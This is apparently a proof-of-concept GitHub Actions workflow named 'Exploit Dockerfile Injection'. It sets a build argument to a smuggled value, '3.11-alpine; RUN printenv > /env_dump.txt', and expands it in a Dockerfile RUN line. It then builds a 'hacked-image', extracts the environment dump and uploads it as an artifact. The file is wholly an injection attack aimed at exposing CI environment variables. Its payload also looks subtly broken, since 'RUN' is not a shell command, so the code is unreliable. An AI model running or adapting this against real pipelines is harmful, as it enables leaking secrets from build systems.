name: Exploit Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  rce_injection:
    runs-on: ubuntu-latest
    env:
      PYTHON_VERSION: "3.11-alpine; RUN printenv > /env_dump.txt"

    steps:
      - name: Create Dockerfile with ARG
        run: |
          echo "FROM alpine" > Dockerfile
          echo "ARG PYTHON_VERSION" >> Dockerfile
          echo "RUN echo Installing Python \$PYTHON_VERSION && apk add python=\$PYTHON_VERSION" >> Dockerfile

      - name: Build Docker image with injected PYTHON_VERSION
        run: docker build --build-arg PYTHON_VERSION="$PYTHON_VERSION" -t hacked-image .

      - name: Extract env_dump from built image
        run: docker run --rm hacked-image cat /env_dump.txt > env_dump.txt

      - name: Upload environment dump as artifact
        uses: actions/upload-artifact@v4
        with:
          name: env_dump
          path: env_dump.txt
